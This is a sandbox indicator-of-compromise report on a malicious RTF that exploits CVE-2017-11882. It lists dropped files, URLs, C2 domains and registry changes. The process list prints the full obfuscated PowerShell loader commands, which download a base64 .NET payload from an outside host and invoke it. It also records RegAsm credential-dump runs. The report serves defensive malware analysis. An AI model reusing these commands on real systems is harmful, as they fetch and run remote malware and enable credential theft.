IOC Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
Rich Text Format data, version 1
initial sample
malicious
C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\makepicturewithgreatthingstobeonline[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{72EA0E42-6FDC-4B96-A501-AB452790C141}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1FA464AF-8054-47FB-B7CE-D3A76F2305F3}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{679FD92C-7EF1-4A2F-ADE8-27F26CF6740E}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bhv83A1.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x34a80619, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bhvB683.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x34a80619, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\h0yzbhl5.kki.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\jmjve4fk.y0d.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\mqun3wpm.4oj.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\muezvmgbhtns
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\yr3kmbrs.y0x.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:10 2023, mtime=Fri Aug 11 15:42:10 2023, atime=Thu Sep 26 07:32:58 2024, length=93195, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$curiteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
data
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\makepicturewithgreatthingstobeon.vBS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRwU0hPbUVbNF0rJFBTSE9NRVszNF0rJ1gnKSggKCdIcVJ1cicrJ2wgJysnPSAnKydWVUYnKydodCcrJ3QnKydwczovL2knKydhNicrJzAwMTAwLnVzLmFyY2hpdmUub3InKydnLycrJzI0L2l0JysnZW1zL2QnKydlJysndGEnKydoLW5vJysndCcrJ2Utdi9EZScrJ3QnKydhaE5vdGUnKydWLnR4dFZVJysnRicrJztIcVJiYScrJ3NlNjQnKydDJysnb250ZW50ID0gKE5ldycrJy1PYmplJysnY3QnKycgU3lzJysndGVtJysnLk4nKydlJysndC5XZScrJ2InKydDJysnbGknKydlJysnbnQnKycpJysnLkRvd25sJysnbycrJ2FkUycrJ3RyaScrJ25nKEhxUnVybCk7SHFSYmknKyduYXJ5Q29udGVudCA9IFtTJysneXN0ZW0uQycrJ28nKyduJysndmVydF06OkZyb21CYXMnKydlNjRTdHJpJysnbmcoSHFSYmFzZScrJzY0QycrJ29udCcrJ2VudCk7SHFSJysnYXMnKydzZW1ibHknKycgPSBbUicrJ2VmbGVjdGlvbi5BcycrJ3NlbScrJ2JseV06OkxvYWQoSCcrJ3FSYicrJ2luYXInKyd5QycrJ29uJysndCcrJ2VudCk7JysnSHEnKydSdHlwZSA9JysnICcrJ0gnKydxUmFzc2UnKydtYmx5LkdldFR5cGUoVicrJ1VGUnVuJysnUCcrJ0UuJysnSG9tZVZVRicrJyk7SCcrJ3FSJysnbWV0JysnaG9kID0gSHFSdCcrJ3lwZS5HZXRNZXQnKydob2QoJysnVlVGVkEnKydJVlVGKTtIcVJtZXQnKydob2QuSW52b2tlKEhxUicrJ251bGwnKycsIFtvYmplY3RbXV1AKFZVJysnRnR4dC4nKydWQkdSLycrJzA1JysnNS8yJysnNScrJy4wMS45Mi41OCcrJzEvLzonKydwdHRoVlVGICwgJysnVlVGZCcrJ2VzYScrJ3QnKydpdicrJ2FkJysnb1ZVRiAnKycsJysnIFZVJysnRmQnKydlc2F0aScrJ3YnKydhZCcrJ29WJysnVUYnKycgJysnLCcrJyBWJysnVUZkZScrJ3MnKydhdGknKyd2YWRvVlVGLCcrJ1ZVRlJlJysnZ0FzbVYnKydVRixWVUZWJysnVUYpKScpLlJlcGxhY2UoKFtjSEFyXTcyK1tjSEFyXTExMytbY0hBcl04MiksW1N0UkluZ11bY0hBcl0zNikuUmVwbGFjZSgoW2NIQXJdODYrW2NIQXJdODUrW2NIQXJdNzApLFtTdFJJbmddW2NIQXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nkbubgbtxayytawgovuosmgrcf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xngebzmuliqlvokkyghpdzaillbyo"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ahlxcrfozqiqgugoprcrgenrualhhmmku"
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\muezvmgbhtns"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjmo"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjfueylyjgoymkoaaythvh"
malicious
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
authurremc.duckdns.org
malicious
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIF
185.29.10.52
malicious
http://185.29.10.52/550/RGBV.txt
185.29.10.52
malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://www.nirsoft.netP
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://go.micros
unknown
http://www.imvu.com/qK
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
207.241.227.240
http://geoplugin.net/json.gp/C
unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFj
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
https://ia600100.us.archive.org
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://185.29.10.52
unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC:
unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Content
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://www.msn.com/
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://www.imvu.com/GK
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 66 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
authurremc.duckdns.org
192.210.150.29
malicious
ia600100.us.archive.org
207.241.227.240
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
185.29.10.52
unknown
European Union
malicious
192.210.150.29
authurremc.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands
207.241.227.240
ia600100.us.archive.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Rmc-7B1J99
exepath
malicious
HKEY_CURRENT_USER\Software\Rmc-7B1J99
licence
malicious
HKEY_CURRENT_USER\Software\Rmc-7B1J99
time
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
1f/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
ig/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
?i/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\292CD
292CD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
